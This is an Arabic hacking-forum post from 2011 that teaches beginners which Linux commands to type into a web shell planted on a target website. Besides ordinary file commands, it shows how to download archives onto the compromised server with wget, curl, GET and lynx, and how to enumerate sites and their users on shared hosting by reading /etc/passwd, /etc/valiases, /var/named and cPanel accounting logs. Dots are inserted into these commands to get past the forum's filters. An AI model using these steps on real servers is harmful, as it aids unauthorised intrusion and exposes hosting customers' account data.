منتديات عالم الهكر

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى خاص لعالم الهكر


    درس تعليم اختراق المواقع للمبتدئين شرح مفصل

    زمن هكر
    زمن هكر
    Admin


    عدد المساهمات : 18
    تاريخ التسجيل : 21/11/2010

    درس تعليم اختراق المواقع للمبتدئين شرح مفصل Empty درس تعليم اختراق المواقع للمبتدئين شرح مفصل

    مُساهمة من طرف زمن هكر الأحد فبراير 06, 2011 2:50 pm

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    درسنا اليوم عن:

    || اوامر الينكس ||

    وضحت في الدرس السابق عن نضام الينكس وقلت انه نضام تشغيل وله اوامر ولم اتطرق او اكتب اي امر
    وتركت لهذي الأوامر درس خاص بها لتصل المعلومات بأبسط صورة ممكنة .. ابدأ بعض الأسئلة المهمة تمهيدا للدرس

    مافائدة اوامر الينكس؟
    فائدتها بأختصار لا تستطيع الأختراق أو التحكم بدونها .. معناته ان مجال اختراق المواقع يعتمد على هذي الأوامر في كل صغيرة وكبيرة

    بعد معرفة الأوامر اين تكتب ومن اخاطب بهذه الأوامر؟
    تكتب الأوامر في الشل بعد زرعه او رفعه في الموقع المستهدف
    وتخاطب بهذه الأوامر السيرفر الذي عليه هذا الموقع وتطلب منه فعل ماتريد في "حدود معينة"

    سنقوم الأن بالتعرف على بعض اوامر الينكس الي راح تفيدنا في الأختراق ان شاء الله

    الأمر: id
    وظيفته: عرض صلاحياتك على السيرفر


    الأمر: pwd
    وظيفته: اظهار مكانك على السيرفر (المسار الي انت عليه)
    مثال: إذا كنت داخل على يوزر بأسم lm3a في مجلد المنتدى لنفترض انه بأسم vb
    بعد تطبيق امر pwd راح يعرض لنا هذا المسار
    / home / lm3a / public_html / vb



    الأمر: ls -la
    وظيفته: عرض جميع الملفات والمجلدات مع تصاريحها
    طبعا يعرض لك على حسب المجلد الذي انت بداخله عند تنفيذ هذا الأمر



    الأمر: cat
    وظيفته: قراءة الملفات
    مثال: إذا أردت قراءة كود ملف بأسم lm3a.php يكون الأمر بهذا الشكل cat lm3a.php

    الأمر: mkdir
    وظيفته: إنشاء مجلد جديد
    مثال: إذا أردت إنشاء مجلد بأسم lm3a يكون الأمر بهذا الشكل mkdir lm3a

    الأمر: chmod xxx
    وظيفته: تغيير تصريح مجلد او ملف
    مثال: إذا اردت تغيير تصريح مجلد بأسم net يكون الأمر بهذا الشكل chmod xxx net
    مع تغيير xxx الى رقم التصريح المطلوب

    الأمر: touch
    وظيفته: إنشاء ملف
    مثال: إذا أردت إنشاء ملف بأسم lm3a.php يكون الأمر بهذا الشكل touch lm3a.php
    طبعا الملف راح يكون فارغ وخالي من الأكواد ممكن انت تكتب فيه شي عن طريق "تحرير الملفات" في الشل

    الأمر: mv
    وظيفته: نقل الملفات أو تغيير تسميتها
    مثال: إذا أردت نقل ملف بأسم lm3a.php الى مكان أخر يكون الأمر بهذا الشكل
    mv lm3a.php / home / ??? / public_html / lm3a
    وتستبدل / home / ??? / public_html / lm3a الى مسار المجلد الي بتنقل الملف اليه
    ويشترط ان يكون هذا المجلد يحمل تصريح (drwxrwxrwx)
    مثال لتغيير تسمية الملف: إذا أردت تغير تسمية ملف بأسم a.php الى b.php
    يكون الأمر بهذا الشكل mv a.php b.php

    الأمر: cp
    وظيفته: نسخ الملفات
    مثال: إذا أردت نسخ ملف بأسم lm3a.php الى مكان أخر يكون الأمر بهذا الشكل
    cp lm3a.php / home / ??? / public_html / up
    وتستبدل / home / ??? / public_html / up الى مسار المجلد الي بتنسخ الملف اليه
    ويشترط ان يكون هذا المجلد يحمل تصريح (drwxrwxrwx)

    الأمر: rm
    وظيفته: حذف ملف
    مثال: إذا أردت حذف ملف بأسم aaa.php يكون الأمر بهذا الشكل rm aaa.php

    الأمر: rm -r
    وظيفته: حذف مجلد
    مثال: إذا أردت حذف مجلد بأسم aaa يكون الأمر بهذا الشكل rm -r aaa

    الأمر: *
    وظيفته: يضاف الى الأوامر المذكورة سابقا وهي ترمز الى "الكل"
    مثال: إذا كنت بداخل مجلد يحتوي على ملفات كثيرة وانت تريد تغيير صلاحيات جميع هذه الملفات
    إلى تصريح معين من المتعب أن تقوم بتغييرها ملف ملف .. فهذا الأمر يختصر المسألة
    بحيث تقوم مثلا بتطبيق هذا الأمر chmod * في هذي الحالة بتلاحظ ان جميع محتويات المجلد وحدت تصاريحها الى التصريح المطلوب

    الأمر: find
    وظيفته: البحث عن ماتريده
    مثال: إذا أردت أن تبحث عن ملف بأسم a.php سيكون الأمر بهذا الشكل find a.php


    مثال أخر: إذا أردت أن تبحث عن أمتداد معين مثل .php يكون الأمر بهذا الشكل find *.php


    مثال أخر: إذا أردت أن تبحث عن أسم معين مثل b سواء كان نوعة ملف او مجلد يكون الأمر بهذا الشكل find b*



    الأمر: ;
    وظيفته: الربط بين الأوامر وتنفيذها جميعها في وقت واحد
    مثال: لو اردت انشاء ملف ثم عرض محتويات المجلد للتأكد بأنه قام بأنشاء الملف
    يكون الأمر بهذا الشكل touch file.php;ls -la كما تشاهد في الأصل الأمر يتكون من امرين
    هما touch و ls -la طبعا تقدر تربط اكثر من امرين وانصح بالأكثار من أستخدامه لأنه بيساعدك كثير


    الأمرين المطبقة في الصوره هي ls -la و id

    أوامر رفع الملفات
    لرفع اي ملف تريد ويفضل ان يكون مضغوط .. طبعا يكون الملف على رابط وليس من جهازك ويوجد أكثر من امر لرفع الملفات وراح اطرح أكثر من أمر لكي لا يصعب عليك رفع ملف في أي حال
    لأن بعض أوامر الرفع لا تستجيب على بعض السيرفرات
    قبل ماتنفذ أمر الرفع تقوم بتطبيق "أمر التأكد" هل يمكنك رفع ملف بواسطة هذا الأمر او لا
    أمر الرفع: wget
    طريقة عمل الأمر: wget www.???.com/lm3a.zip
    أمر الرفع: curl
    طريقة عمل الأمر: curl -o lm3a.zip www.???.com/lm3a.zip
    أمر الرفع: GET
    طريقة عمل الأمر: GET www.???.com/lm3a.zip > lm3a.zip
    أمر الرفع: lynx
    طريقة عمل الأمر: lynx -source www.???.com/lm3a.zip > lm3a.zip
    أمر التأكد من عمل اوامر الرفع: which xxxx واتسبدل xxxx بأمر الرفع
    اذا كان الناتج بهذا الشكل / usr / bin /xxxx معناتة يمكنك أستخدام هذا الأمر في الرفع
    xxxx تتغير إلى أمر الرفع الي طبقتة

    الأمر: unzip
    وظيفته: فك ضغط الملفات والمجلدات المضغوطة بواسطة برنامج الضغط winzip
    مثال: إذا أردات أن تقوم بفك ضغط ملف بأسم lm3a.zip يكون الأمر بهذا الشكل unzip lm3a.zip

    نكتفي بطرح هذي الأوامر
    للمعلومية جميع الأوامر السابقة تستطيع تسميتها بالأوامر الداخلية لأنها تنفذ في نفس المسار الي انت بداخله

    وسأطرح بعض الأوامر الخارجية
    واغلب الأوامر الخارجية تكون لأهداف معينة تفيدنا بجمع المعلومات
    ملاحظة: جميع الأوامر التي بأسفل عند تنفيذها قم بحذف النقاط لأن النقاط كتبت بسبب حماية المنتدى تمنع كتابة مثل هذي الأوامر

    الأمر: cat /.etc./.passwd
    وظيفته: إظهار جميع يوزرات المواقع

    الأمر: ls /.var./.named
    وظيفته: إظهار المواقع

    الأمر: ls -la /.etc./.valiases
    وظيفته: إظهار المواقع يوزراتها

    الأمر: cat /.var./.cpanel./.accounting.log
    وظيفته: إظهار جميع المواقع يوزراتها

    الأمر: find / -type f -name "lm3a*"
    وظيفته: أمر بحث شامل في جميع انحاء السيرفر فقط استبدل lm3a بالأسم الي تبحث عنه
    تحياتي لكم

    اخوكم :- زمن هكر

      الوقت/التاريخ الآن هو الخميس أكتوبر 31, 2024 6:10 pm